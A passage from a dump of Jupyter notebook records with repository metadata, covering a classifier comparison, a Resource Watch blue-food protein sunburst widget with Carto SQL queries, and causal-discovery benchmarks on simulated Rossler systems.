[LogisticRegression(solver='liblinear'), RandomForestClassifier(n_estimators=400, random_state=42), \n DecisionTreeClassifier(random_state=42), svm.SVC(kernel='rbf', gamma='scale', random_state=42), \n KNeighborsClassifier()]", "_____no_output_____" ], [ "#utilizando a validação cruzada\nmean=[]\nstd=[]\nfor model in modelos:\n result = cross_val_score(model, x, y, cv=kfold, scoring=\"accuracy\", n_jobs=-1)\n mean.append(result)\n std.append(result)", "_____no_output_____" ], [ "classificadores=['Regressão Logística', 'Random Forest', 'Árvore de Decisão', 'SVM', 'KNN']\n\nplt.figure(figsize=(12, 12))\nfor i in range(len(mean)):\n sns.distplot(mean[i], hist=False, kde_kws={\"shade\": True})\n \nplt.title(\"Distribuição de cada um dos classificadores\", fontsize=15)\nplt.legend(classificadores)\nplt.xlabel(\"Acurácia\", labelpad=20)\nplt.yticks([])\n\nplt.show()", "_____no_output_____" ] ], [ [ "**Realizando a previsão dos classificadores**", "_____no_output_____" ], [ "** Quais algoritmos escollher?**", "_____no_output_____" ] ], [ [ "# Dividindo o dataset entre treinamento 80% e teste 20%\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, stratify=y, \n shuffle=True, random_state=42)", "_____no_output_____" ], [ "#escolhendo o svm e a floresta randomica\nsvm_clf = svm.SVC(C=0.9, gamma=0.1, kernel='rbf', probability=True, random_state=42)\nrf_clf = RandomForestClassifier(n_estimators=400, n_jobs=-1, random_state=42)\n\n# Treina os modelos\nsvm_clf.fit(x_train, y_train)\nrf_clf.fit(x_train, y_train)", "_____no_output_____" ], [ "# obtém as probabilidades previstas\nsvm_prob = svm_clf.predict_proba(x_test)\nrf_prob = rf_clf.predict_proba(x_test)\n\n# Valores reais\nsvm_preds = np.argmax(svm_prob, axis=1)\nrf_preds = np.argmax(rf_prob, axis=1)", "_____no_output_____" ], [ "#analisando os modelos \ncm = metrics.confusion_matrix(y_test, svm_preds)\ncm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\ncm2 = metrics.confusion_matrix(y_test, rf_preds)\ncm2 = cm2.astype('float') / cm2.sum(axis=1)[: , np.newaxis]\n\nclasses = [\"Morto\", \"Vivo\"]\nf, ax = plt.subplots(1, 2, figsize=(15, 5))\nax[0].set_title(\"SVM\", fontsize=15.)\nsns.heatmap(pd.DataFrame(cm, index=classes, columns=classes), \n cmap='winter', annot=True, fmt='.2f', ax=ax[0]).set(xlabel=\"Previsao\", ylabel=\"Valor Real\")\n\nax[1].set_title(\"Random Forest\", fontsize=15.)\nsns.heatmap(pd.DataFrame(cm2, index=classes, columns=classes), \n cmap='winter', annot=True, fmt='.2f', ax=ax[1]).set(xlabel=\"Previsao\", \n ylabel=\"Valor Real\")", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code" ] ]
cb1ec0666cafaaccec5f977fc52092bb400f05f6
108,806
ipynb
Jupyter Notebook
widgets/ocn_calcs_015_blue_food_protein_supply/blue_food_visulization.ipynb
resource-watch/ocean-watch-data
569011ae51a60efc87106aa2098227d5c6fbfc67
[ "MIT" ]
null
null
null
widgets/ocn_calcs_015_blue_food_protein_supply/blue_food_visulization.ipynb
resource-watch/ocean-watch-data
569011ae51a60efc87106aa2098227d5c6fbfc67
[ "MIT" ]
null
null
null
widgets/ocn_calcs_015_blue_food_protein_supply/blue_food_visulization.ipynb
resource-watch/ocean-watch-data
569011ae51a60efc87106aa2098227d5c6fbfc67
[ "MIT" ]
null
null
null
134.162762
80,773
0.848657
[ [ [ "# Blue Food", "_____no_output_____" ], [ "Visualizing protein supply and how the practices generating that protein supply affect the ocean using a heirarchical relationship.\n\nNote that this is a parameterized widget; the specification passed to the API will not be renderable without the geostore identifier being inserted. ", "_____no_output_____" ], [ "*Author: Rachel Thoms\n<br>Created: 08 24 2021\n<br>Environment: jupyterlab*", "_____no_output_____" ], [ "## Style", "_____no_output_____" ], [ "- Vega chart\n- Chart type: [Sunburst](https://vega.github.io/vega/examples/sunburst/)\n- Value: Protein Supply (g/capita/day)", "_____no_output_____" ], [ "## Data", "_____no_output_____" ], [ "- Data: [ocn_calcs_015_blue_food_protein_supply](https://resourcewatch.carto.com/u/wri-rw/dataset/ocn_calcs_015_blue_food_protein_supply)\n- Resource Watch: [explore page](https://resourcewatch.org/data/explore/9e1b3cad-db6f-44b0-b6fb-048df7b6c680)\n- Source: [FAO Food Balance Sheet](http://www.fao.org/faostat/en/#data/FBS)", "_____no_output_____" ], [ "## Preparation", "_____no_output_____" ], [ "### Vega", "_____no_output_____" ] ], [ [ "import json\nfrom vega import Vega\nfrom IPython.display import display", "_____no_output_____" ], [ "def Vega(spec):\n bundle = {}\n bundle['application/vnd.vega.v5+json'] = spec\n display(bundle, raw=True)", "_____no_output_____" ], [ "widget_width = 600\nwidget_height = 600", "_____no_output_____" ] ], [ [ "## Visualization", "_____no_output_____" ], [ "### Queries", "_____no_output_____" ], [ "#### Testing", "_____no_output_____" ], [ "``` gid_0 = 'JPN' ``` used as stand-in for parameterized ```geostore_id={{geostore_id}}``` in production version", "_____no_output_____" ], [ "```sql\nSELECT alias.iso as gid_0, data.area, year, item as id, parent, size, value as protein, analysis_category, product \nFROM \n (SELECT * FROM foo_061_rw1_blue_food_supply_edit) data \nINNER JOIN ow_aliasing_countries AS alias ON alias.alias = data.area \nWHERE iso='JPN' \nORDER BY analysis_category ASC, id ASC\n```", "_____no_output_____" ], [ "#### Parameterization", "_____no_output_____" ], [ "```sql\nSELECT gadm.gid_0 as gid_0, data.area, year, item as id, parent, size, value as protein, analysis_category, product \nFROM \n (SELECT * FROM foo_061_rw1_blue_food_supply_edit) data \nLEFT OUTER JOIN ow_aliasing_countries AS alias ON alias.alias = data.area \nLEFT OUTER JOIN gadm36_0 gadm ON alias.iso = gadm.gid_0 \nWHERE gadm.{{geostore_env}} ILIKE '{{geostore_id}}' \nORDER BY analysis_category ASC, id ASC\n```", "_____no_output_____" ] ], [ [ "spec=json.loads(\"\"\"{\n \"$schema\": \"https://vega.github.io/schema/vega/v5.json\",\n \"padding\": 5,\n \"autosize\": \"pad\",\n \"signals\": [\n {\n \"name\": \"year\",\n \"value\": 2018,\n \"bind\": {\"input\": \"range\", \"min\": 1961, \"max\": 2018, \"step\": 1}\n }\n ],\n \"data\": [\n {\n \"name\": \"table\",\n \"url\": \"https://wri-rw.carto.com/api/v2/sql?q= SELECT gadm.gid_0 as gid_0, data.area, year, item as id, parent, size, value as protein, analysis_category, product FROM (SELECT * FROM ocn_calcs_015_blue_food_protein_supply) data LEFT OUTER JOIN ow_aliasing_countries AS alias ON alias.alias = data.area LEFT OUTER JOIN gadm36_0 gadm ON alias.iso = gadm.gid_0 WHERE gadm.{{geostore_env}} ILIKE '{{geostore_id}}' ORDER BY analysis_category ASC, id ASC, year DESC\",\n \"format\": {\"type\": \"json\", \"property\": \"rows\"},\n \"transform\": [\n {\"type\": \"filter\", \"expr\": \"datum.year==year\"},\n {\"type\": \"stratify\", \"key\": \"id\", \"parentKey\": \"parent\"},\n {\n \"type\": \"partition\",\n \"field\": \"size\",\n \"sort\": {\"field\": [\"analysis_category\"]},\n \"size\": [{\"signal\": \"2 * PI\"}, {\"signal\": \"width/4\"}],\n \"as\": [\"a0\", \"r0\", \"a1\", \"r1\", \"depth\", \"children\"],\n \"padding\": 0\n },\n {\"type\": \"formula\", \"expr\": \"split(datum.id,'_')[0]\", \"as\": \"label\"},\n {\"type\": \"formula\", \"expr\": \"datum.protein ? format((datum.protein), '.1f') + ' g/capita/day' : ''\", \"as\": \"protein\"}\n ]\n }\n ],\n \"scales\": [\n {\n \"name\": \"legend\",\n \"type\": \"ordinal\",\n \"domain\": [\"Total food supply\", \"Pressure-generating, land-sourced foods\",\"Ocean-sourced foods\", \"Other land-sourced foods\"],\n \"range\": [\"#f3b229\",\"#f5c93a\",\"#2670a5\",\"#e8d59a\"]\n },\n {\n \"name\": \"blues\",\n \"type\": \"linear\",\n \"domain\": {\"data\": \"table\", \"field\": \"depth\"},\n \"range\": [\"#2670a5\", \"#3d7fae\", \"#538fb7\", \"#699fc0\"],\n \"domainMin\": 1,\n \"reverse\": false\n },\n {\n \"name\": \"greys\",\n \"type\": \"ordinal\",\n \"domain\": {\"data\": \"table\", \"field\": \"depth\"},\n \"range\": [\"#f2e2b2\", \"#f7e9be\", \"#fcf0ca\",\"#e8d59a\"]\n },\n {\n \"name\": \"oranges\",\n \"type\": \"linear\",\n \"domain\": {\"data\": \"table\", \"field\": \"depth\"},\n \"range\": [\"#f3b229\", \"#f4c141\", \"#f5c93a\", \"#f6d544\", \"#f6e04e\"],\n \"domainMin\": 1,\n \"reverse\": false\n\n },\n {\"name\": \"opacity\",\n \"type\": \"linear\",\n \"domain\": {\"data\": \"table\", \"field\": \"depth\"},\n \"domainMin\": 1,\n \"reverse\": true,\n \"range\": [0.85,1]}\n ],\n \"marks\": [\n {\n \"type\": \"arc\",\n \"from\": {\"data\": \"table\"},\n \"encode\": {\n \"enter\": {\n \"x\": {\"signal\": \"width/3\"},\n \"y\": {\"signal\": \"height/2\"},\n \"zindex\": {\"value\": 1},\n \"opacity\": [{\"test\": \"test(/Secondary/, datum.product)\", \"value\": 0.5 },{\"value\": 1}],\n \"fill\": [\n {\n \"scale\": {\n \"signal\": \n \"(datum.analysis_category === 'Other Land-Sourced Foods' ? 'greys': datum.analysis_category === 'Ocean-Sourced Foods' ? 'blues' : 'oranges')\"\n },\n \"field\": \"depth\"\n }\n ]\n },\n \"update\": {\n \"startAngle\": {\"field\": \"a0\"},\n \"endAngle\": {\"field\": \"a1\"},\n \"innerRadius\": {\"field\": \"r0\"},\n \"outerRadius\": {\"field\": \"r1\"},\n \"stroke\": {\"value\": \"white\"},\n \"strokeWidth\": {\"value\": 0.5},\n \"zindex\": {\"value\": 1}\n },\n \"hover\": {\n \"stroke\": {\"value\": \"red\"},\n \"strokeWidth\": {\"value\": 2},\n \"zindex\": {\"value\": 0}\n }\n }\n }\n ],\n \"legends\": [\n {\n \"title\": [\"Sources of Protein\"],\n \"orient\": \"none\",\n \"legendX\": {\"signal\" : \"width*.65\"},\n \"legendY\": {\"signal\" : \"height*.4\"},\n \"type\": \"symbol\",\n \"fill\": \"legend\",\n \"titleFontSize\": {\"signal\": \"width/40\"},\n \"titleFont\": \"Lato\",\n \"labelFontSize\": {\"signal\": \"width/50\"},\n \"labelFont\": \"Lato\",\n \"clipHeight\": 16,\n \"encode\": {\n \"labels\": {\n \"interactive\": true,\n \"enter\": {\n \"tooltip\": {\n \"signal\": \"datum.label\"\n }\n },\n \"update\": {\n \"fill\": {\"value\": \"grey\"}\n },\n \"hover\": {\n \"fill\": {\"value\": \"firebrick\"}\n }\n }\n }\n }\n ],\n \"interaction_config\": [\n {\n \"name\": \"tooltip\",\n \"config\": {\n \"fields\": [\n {\n \"column\": \"label\",\n \"property\": \"Commodity\",\n \"type\": \"text\",\n \"format\": \"\"\n },\n {\n \"column\": \"protein\",\n \"property\": \"Contribution to protein supply\",\n \"type\": \"text\",\n \"format\": \"\"\n }\n ]\n }\n }\n ]\n}\n\"\"\")", "_____no_output_____" ], [ "vega_view=dict(spec)\nvega_view['legends'][0]['labelFont'] = 'Arial'\nvega_view['legends'][0]['titleFont'] = 'Arial'\nvega_view['height'] = widget_height\nvega_view['width'] = widget_width\nvega_view['data'][0]['url']= vega_view['data'][0]['url'].replace('{{geostore_env}}','geostore_prod')\nvega_view['data'][0]['url'] = vega_view['data'][0]['url'].replace('{{geostore_id}}','f653d0a434168104f4bdcdf8c712d079')\nVega(vega_view)", "_____no_output_____" ] ], [ [ "[Open the Chart in the Vega Editor](https://vega.github.io/editor/#/url/vega/N4IgJAzgxgFgpgWwIYgFwhgF0wBwqgegIDc4BzJAOjIEtMYBXAI0poHsDp5kTykSArJQBWENgDsQAGhAATONABONHJnaT0AQXEACOAA8kCHABs4OtgDMdSHRBxIocALSWGJkzXFkdipLJokEx0TJABPNgZMHUs2RR0YGjg-RVgaKCCdWSRMKmkQAHcaWXo0AQAGcpl4GjIsNABmSpkHWQDvMpkkKLYIGgAvODQQVvy+snEgiDQAbVBJhCH0MLgkRXziIIYlgCZygEYADhkmL1k0UC8cKOG-byGZBC80fYBOADZ9x6R9ND2jmQQTBwHAvAC+YKk8yMSxAUEi4kwijCGy2sIAwgB5AAy+VO4nOqEu4mumGGEDgZigZJkbFU6mmqBmIAAQgAlTT5ACSABEAHL5LG4mQAUQAKgAJfIAWRFAA1uXyefkRQBlMWCiUCmQAcXZ+T52OVMjFAFU2flTarOTIAFIABQFAF0IU6ZNlcrNoYthrkmGZ8gxFCZhlhcPgiAVlM5FAVKBlFJg2PG2AgCEgcDQSDtOABHEwAflzAF4dKqRdiReixTZPEgIKwxDYIDpaLIAPpVLI5KhrVZSHQrNYDuiIZs6YoDhyKOCIgd9QYDzYmbbjnCKNjArwDpCTExhPoQdsZYFkOJhKcb2QMak6ABibMx0p0AApy5XqzoAFT3x-P2JsJ2nztrG+ztv62ztgBHYQAwOCmGE7ZwAEmAAJTdrkOhcnyfIimyOi2pi2EWAU7ZBIEfTeMeCJIkkLaaKqtYUTomJ8kx9aUOR9Y6KWHq9jOtiYmyPJ4ToLIAJo2HuB40EeJ7kOeOgMeiI6yEpqrovksSKMgZJEiAmBhDgsKiBI+TrnSySGbcbAFNMkIGXcEDaQgXoGUZsKWDQJjAusMgGOuwwegwCDUMUnY8aW8IMIiyIgJCoCGcZwxeT5yT5AF6zoMFoVDooxbFnl8VQu5yXoECfhqJYKIyAA1nAKLoMU5l9oiADSDXDNOs5kglpWwtOahqGZMheZShIgAuDyTXEemgGNJiEsyu5BDJck5ApcUuoCAxLHMk21Huww7N+Oj2lyxWgOMR3oEUJQwAQAAs8VuiA9azG95T5IoX1dPs33-e6IKlDIaSLTOkiva07RkGg5Rgi6r3QEEChuQssJmGQs7nDISWwnE7RBPksipkgzxMiAYqbpk0F2HBCH5PaM4QLBM7OFj4jJDkXhkAOoQEs4YhBk4anQdMMiYk4u6C5EqTITEbBsLI4sgJi9DJCEu6yDLwvy2LICvXcWMfQAxJYDRMDsOyvPkZsCFArwNCgMgmzs7wAOzlEgAi23AhyyAIrwoNt3qwhBqO4x5wyeJzazE6T5OgHxvpIP600LRN8iqDAxUgEbe0gK7Htez7LsNLI7uWEg00mwIDSHJYTDu7b7yvK8lhQF9r0k8gXjSuTXx53ApCKBSaBVyYFJ9ejwxkDOB75HjwwE14RPugnGhJz2Kdp1pSSLUFwM5w5+em5YOxwDslu25Y7twK8TA1x3ljlBkvv+4HwfTzCy-5yrS-oBjqsPycgN4XDkNvdAfoAyjX3pnI+udT4UzNhbK2NsXaWEelAfYj1AaF0sPbR2zt8HvADo9Z6GD3hwHKI9IY3cN79w0IPGcI8x6oAnlPEqM90B0kcHQGq-Vo5eGAfHXum8IGeiganGBIAM6H2zrnHuZNxCMJeDIFhyQ2FIm2Oo3cxsmTlEoIcAQUh9iI2+IoWqjJ9oALeqkLSG5XL6WTlI3eDlZzwnkOAnq6V9K-H0tdImt1ij0AIA0XOjUrqHSCRgOAtQsAEB2LnfoZwDDgOXNscEtIHBQH4W5YEQJfQKEwC+Agqo4DwgJGsMIBABw5UoBZa81JUKohXEsQxAg+oZKWPsBGsCPBuWRgGAJ0SQzoBfPUla+5DzHg2meZEkVSwAHI1bwHiNiLWzhVSyxFveRWyslk6ALDoJZc8GoQCWagDCIVOLSRmfJeZYRFknMlqscQWydnyzvPsi5RyTnh1+VcpZcQ9EKCWS0hycjsoIL6QZRWPkVDgMCWMyapg6ATJyDcycSz2zgpmOUJ0OgADUr56kWS3LoY5lyTnEoVjpHIL4MWYBueSuJ4hUIDiWZQfYlhwW0sOWQAgGRMy5AINkMIhygXgvig5OCHolhXVyImbQZBhnzTgcMJAX13EEhVWq2RGr0BIH+g5LwnNFBsn8DQBgjJ1XjVuNq2kURkiWoCDa8BUK84msBEiNg9V0lomGAURIwJc4VT9XAAA6iEnO+lulw0oJ0mQKSCRpLjYG1AvSHIwDYCPJFvr-XprabcZCYaC1RpjQG4tqAdgORTfIfxoB42oHhhCWFmNsbWMSnQYZzJtm6xbFYM6G4KUG1pMoHqwxxASGmh2gkCoRkTBiXdegX5KDvB9g5OdshxJItGaGOJdRMBrueg5WxEAwgICYGwEM-SUXbsXj2uA3zESql2nupdKKV0PUeo6gyT6X16RAJoZQa8QChEfiYQDb7BgfpuoUGNBAKi5wg5SQDwwQOBFvXCTwOAJSHvqJm94-lxCeIVeB1OlJbUgC8L5RwahSBoG0XAEjvlwFJhvWoUEi74P1NQyGCEMg5UbQ9d5MZTaM0gDOSiQTGBc2+PVQMotmT0BeRnEwZQUBaoyrbS6IAA)", "_____no_output_____" ], [ "# Indicator", "_____no_output_____" ], [ "## Rank", "_____no_output_____" ], [ "Query:\n```sql\nSELECT \n CONCAT(rank, ' of ', max_rank) \n FROM (\n SELECT \n gid_0,\n geostore_prod, \n rank, \n MAX(rank) OVER (PARTITION BY true) AS max_rank \n FROM (\n SELECT \n gid_0,\n geostore_prod, \n RANK() OVER(ORDER BY prop DESC) as rank \n FROM (\n SELECT \n area, \n SUM(\n CASE\n WHEN item = 'Ocean-Sourced Foods' THEN value \n ELSE 0\n END)/\n NULLIF(\n SUM(\n CASE\n WHEN item = 'Grand Total' THEN value\n ELSE 0\n END),0) prop\n FROM ocn_calcs_015_blue_food_protein_supply \n WHERE year = 2018 GROUP BY area) data \n LEFT JOIN ow_aliasing_countries AS alias ON alias.alias = data.area \n LEFT JOIN gadm36_0 gadm ON alias.iso = gadm.gid_0 \n WHERE prop is not null AND coastal = true) ranked\nGROUP BY rank, geostore_prod, gid_0) max_rank\nWHERE {{geostore_env}} ILIKE '{{geostore_id}}'\n```", "_____no_output_____" ], [ "query: [https://wri-rw.carto.com/api/v2/sql?q=SELECT CONCAT(rank, ' of ', max_rank) AS value FROM (SELECT gid_0, geostore_prod,rank, MAX(rank) OVER (PARTITION BY true) AS max_rank FROM (SELECT gid_0, geostore_prod,RANK() OVER(ORDER BY prop DESC) as rank FROM (SELECT area, SUM(CASE WHEN item = 'Ocean-Sourced Foods' THEN value ELSE 0 END)/NULLIF(SUM(CASE WHEN item = 'Grand Total' THEN value ELSE 0 END),0) prop FROM ocn_calcs_015_blue_food_protein_supply WHERE year = 2018 GROUP BY area) data LEFT JOIN ow_aliasing_countries AS alias ON alias.alias = data.area LEFT JOIN gadm36_0 gadm ON alias.iso = gadm.gid_0 WHERE prop is not null AND coastal = true) ranked GROUP BY rank, geostore_prod, gid_0) max_rank WHERE {{geostore_env}} ILIKE '{{geostore_id}}'](https://wri-rw.carto.com/api/v2/sql?q=SELECT%20CONCAT(rank,%20%27%20of%20%27,%20max_rank)%20AS%20value%20FROM%20(SELECT%20gid_0,%20geostore_prod,rank,%20MAX(rank)%20OVER%20(PARTITION%20BY%20true)%20AS%20max_rank%20FROM%20(SELECT%20gid_0,%20geostore_prod,RANK()%20OVER(ORDER%20BY%20prop%20DESC)%20as%20rank%20FROM%20(SELECT%20area,%20SUM(CASE%20WHEN%20item%20=%20%27Ocean-Sourced%20Foods%27%20THEN%20value%20ELSE%200%20END)/NULLIF(SUM(CASE%20WHEN%20item%20=%20%27Grand%20Total%27%20THEN%20value%20ELSE%200%20END),0)%20prop%20FROM%20ocn_calcs_015_blue_food_protein_supply%20WHERE%20year%20=%202018%20GROUP%20BY%20area)%20data%20LEFT%20JOIN%20ow_aliasing_countries%20AS%20alias%20ON%20alias.alias%20=%20data.area%20LEFT%20JOIN%20gadm36_0%20gadm%20ON%20alias.iso%20=%20gadm.gid_0%20WHERE%20prop%20is%20not%20null%20AND%20coastal%20=%20true)%20ranked%20GROUP%20BY%20rank,%20geostore_prod,%20gid_0)%20max_rank%20WHERE%20gid_0%20ILIKE%20%27MEX%27)", "_____no_output_____" ], [ "## Value", "_____no_output_____" ], [ "Description: Blue protein as a proportion of total protein", "_____no_output_____" ], [ "Query:\n``` sql\nSELECT SUM(ocean_value)/NULLIF(SUM(total_value),0)*100 AS value FROM (SELECT area, year, item, CASE\n\tWHEN item = 'Ocean-Sourced Foods' THEN value \n ELSE 0\n END ocean_value,\nCASE\n WHEN item = 'Grand Total' THEN value\n ELSE 0\n END total_value\nFROM ocn_calcs_015_blue_food_protein_supply\nWHERE year = 2018) data\nLEFT JOIN ow_aliasing_countries AS alias ON alias.alias = data.area \nLEFT JOIN gadm36_0 gadm ON alias.iso = gadm.gid_0 \nWHERE gadm.{{geostore_env}} ILIKE '{{geostore_id}}'\nGROUP by area\n```", "_____no_output_____" ], [ "query: [https://wri-rw.carto.com/api/v2/sql?q=SELECT SUM(ocean_value)/NULLIF(SUM(total_value),0)*100 AS value FROM (SELECT area, year, item, CASE WHEN item = 'Ocean-Sourced Foods' THEN value ELSE 0 END ocean_value, CASE WHEN item = 'Grand Total' THEN value ELSE 0 END total_value FROM ocn_calcs_015_blue_food_protein_supply WHERE year = 2018) data LEFT JOIN ow_aliasing_countries AS alias ON alias.alias = data.area LEFT JOIN gadm36_0 gadm ON alias.iso = gadm.gid_0 WHERE gadm.{{geostore_env}} ILIKE '{{geostore_id}}' GROUP by area](https://wri-rw.carto.com/api/v2/sql?q=SELECT%20SUM(ocean_value)/NULLIF(SUM(total_value),0)*100%20AS%20value%20FROM%20(SELECT%20area,%20year,%20item,%20CASE%20WHEN%20item%20=%20%27Ocean-Sourced%20Foods%27%20THEN%20value%20ELSE%200%20END%20ocean_value,%20CASE%20WHEN%20item%20=%20%27Grand%20Total%27%20THEN%20value%20ELSE%200%20END%20total_value%20FROM%20ocn_calcs_015_blue_food_protein_supply%20WHERE%20year%20=%202018)%20data%20LEFT%20JOIN%20ow_aliasing_countries%20AS%20alias%20ON%20alias.alias%20=%20data.area%20LEFT%20JOIN%20gadm36_0%20gadm%20ON%20alias.iso%20=%20gadm.gid_0%20WHERE%20gadm.gid_0%20ILIKE%20%27MEX%27%20GROUP%20by%20area)", "_____no_output_____" ], [ "## RW API", "_____no_output_____" ], [ "- [back office](https://resourcewatch.org/admin/data/widgets/731293a0-b92f-4804-b59c-69a1d794ad73/edit?dataset=9e1b3cad-db6f-44b0-b6fb-048df7b6c680)\n- parent dataset [foo_061](https://resourcewatch.org/data/explore/9e1b3cad-db6f-44b0-b6fb-048df7b6c680) \n- dataset id ```9e1b3cad-db6f-44b0-b6fb-048df7b6c680```\n- widget id: ```731293a0-b92f-4804-b59c-69a1d794ad73```", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ] ]
cb1edf40849d51dd7c528c68d729e4cafd0f666e
7,343
ipynb
Jupyter Notebook
experiments/Paper_experiments_Rossler.ipynb
vanderschaarlab/Graphical-modelling-continuous-time
6020e6859d8eec08d3d216e347f2458c67036a91
[ "MIT" ]
1
2022-02-13T18:36:30.000Z
2022-02-13T18:36:30.000Z
experiments/Paper_experiments_Rossler.ipynb
vanderschaarlab/Graphical-modelling-continuous-time
6020e6859d8eec08d3d216e347f2458c67036a91
[ "MIT" ]
1
2022-03-24T21:54:02.000Z
2022-03-24T21:54:02.000Z
experiments/Paper_experiments_Rossler.ipynb
alexisbellot/Graphical-modelling-continuous-time
6020e6859d8eec08d3d216e347f2458c67036a91
[ "MIT" ]
null
null
null
29.971429
109
0.514367
[ [ [ "Rossler performance experiments", "_____no_output_____" ] ], [ [ "import numpy as np\nimport torch\nimport sys\n\nsys.path.append(\"../\")\nimport utils as utils\nimport NMC as models\nimport importlib", "_____no_output_____" ] ], [ [ "## SVAM", "_____no_output_____" ] ], [ [ "# LiNGAM / SVAM performance with sparse data\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\nfor p in [10, 50]:\n perf = []\n for i in range(20):\n # Simulate data\n T = 1000\n num_points = T\n data, GC = utils.simulate_rossler(p=p, a=0, T=T, delta_t=0.1, sd=0.05, burn_in=0, sigma=0.0)\n\n # format for NeuralODE\n data = torch.from_numpy(data[:, None, :].astype(np.float32))\n\n from benchmarks.lingam_benchmark import lingam_method\n\n importlib.reload(utils)\n graph = lingam_method(data.squeeze().detach())\n perf.append(utils.compare_graphs(GC, graph)) # tpr, fdr\n\n print(\"Means and standard deviations for TPR, FDR and AUC with\", p, \"dimensions\")\n print(np.mean(np.reshape(perf, (-1, 3)), axis=0), np.std(np.reshape(perf, (-1, 3)), axis=0))", "Means and standard deviations for TPR, FDR and AUC with 10 dimensions\n[0.77368421 0.53953499 0.49996751] [0.10273274 0.06081473 0.02438485]\nMeans and standard deviations for TPR, FDR and AUC with 50 dimensions\n[0.59141414 0.66847463 0.49049291] [0.10153776 0.06151317 0.02785143]\n" ] ], [ [ "# DCM", "_____no_output_____" ] ], [ [ "# DCM performance with sparse data\nfor p in [10, 50]:\n perf = []\n for i in range(10):\n # Simulate data\n T = 1000\n num_points = T\n data, GC = utils.simulate_rossler(p=p, a=0, T=T, delta_t=0.1, sd=0.05, burn_in=0, sigma=0.0)\n\n from benchmarks.DCM import DCM_full\n\n graph = DCM_full(data, lambda1=0.001, s=4, w_threshold=0.1)\n # plt.matshow(abs(graph),cmap='Reds')\n # plt.colorbar()\n # plt.show()\n perf.append(utils.compare_graphs(GC, graph)) # tpr, fdr\n\n print(\"Means and standard deviations for TPR, FDR and AUC with\", p, \"dimensions\")\n print(np.mean(np.reshape(perf, (-1, 3)), axis=0), np.std(np.reshape(perf, (-1, 3)), axis=0))", "Means and standard deviations for TPR, FDR and AUC with 10 dimensions\n[0.779 0.452 0.864] [0.135 0.115 0.092]\nMeans and standard deviations for TPR, FDR and AUC with 50 dimensions\n[0.97 0.716 0.983] [2.220e-16 1.151e-01 8.450e-04]\n" ] ], [ [ "# PCMCI", "_____no_output_____" ] ], [ [ "# pcmci performance with sparse data\nfor p in [10, 50]:\n perf = []\n for i in range(5):\n # Simulate data\n T = 1000\n num_points = T\n data, GC = utils.simulate_rossler(p=p, a=0, T=T, delta_t=0.1, sd=0.05, burn_in=0, sigma=0.0)\n\n from benchmarks.pcmci import pcmci\n\n importlib.reload(utils)\n graph = pcmci(data)\n perf.append(utils.compare_graphs(GC, graph)) # tpr, fdr\n\n print(\"Means and standard deviations for TPR, FDR and AUC with\", p, \"dimensions\")\n print(np.mean(np.reshape(perf, (-1, 3)), axis=0), np.std(np.reshape(perf, (-1, 3)), axis=0))", "Could not import packages for CMIknn and GPDC estimation\nCould not import r-package RCIT\nMeans and standard deviations for TPR, FDR and AUC with 10 dimensions\n[0.768 0.76 0.597] [0.123 0.041 0.083]\nMeans and standard deviations for TPR, FDR and AUC with 50 dimensions\n[0.685 0.925 0.668] [0.068 0.006 0.018]\n" ] ], [ [ "## NGM", "_____no_output_____" ] ], [ [ "# NGM performance with sparse data\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\nfor p in [10, 50]:\n perf = []\n for i in range(5):\n # Simulate data\n T = 1000\n num_points = T\n data, GC = utils.simulate_rossler(p=p, a=0, T=T, delta_t=0.1, sd=0.05, burn_in=0, sigma=0.0)\n\n # format for NeuralODE\n data = torch.from_numpy(data[:, None, :])\n\n import NMC as models\n\n func = models.MLPODEF(dims=[p, 12, 1], GL_reg=0.1)\n\n # GL training\n models.train(func, data, n_steps=2000, plot=False, plot_freq=20)\n # AGL training\n # weights = func.group_weights()\n # func.GL_reg *= (1 / weights)\n # func.reset_parameters()\n # models.train(func,data,n_steps=1000,plot = True, plot_freq=20)\n graph = func.causal_graph(w_threshold=0.1)\n perf.append(utils.compare_graphs(GC, graph)) # tpr, fdr\n\n print(\"Means and standard deviations for TPR, FDR and AUC with\", p, \"dimensions\")\n print(np.mean(np.reshape(perf, (-1, 3)), axis=0), np.std(np.reshape(perf, (-1, 3)), axis=0))", "Means and standard deviations for TPR, FDR and AUC with 10 dimensions\n[0.863 0. 0.932] [0.026 0. 0.013]\nMeans and standard deviations for TPR, FDR and AUC with 50 dimensions\n[0.974 0.11 0.987] [0.005 0.043 0.002]\n" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
cb1eeecc032a17b6948b1d20d2ce0f4a2660c28d
3,460
ipynb
Jupyter Notebook
colab_notebook_main.ipynb
mueedhafiz1982/point-cloud-generation-from-2D_image
a0067d369f0824846a90948d50522e05bf2742c4
[ "MIT" ]
null
null
null
colab_notebook_main.ipynb
mueedhafiz1982/point-cloud-generation-from-2D_image
a0067d369f0824846a90948d50522e05bf2742c4
[ "MIT" ]
null
null
null
colab_notebook_main.ipynb
mueedhafiz1982/point-cloud-generation-from-2D_image
a0067d369f0824846a90948d50522e05bf2742c4
[ "MIT" ]
null
null
null
32.641509
158
0.553468
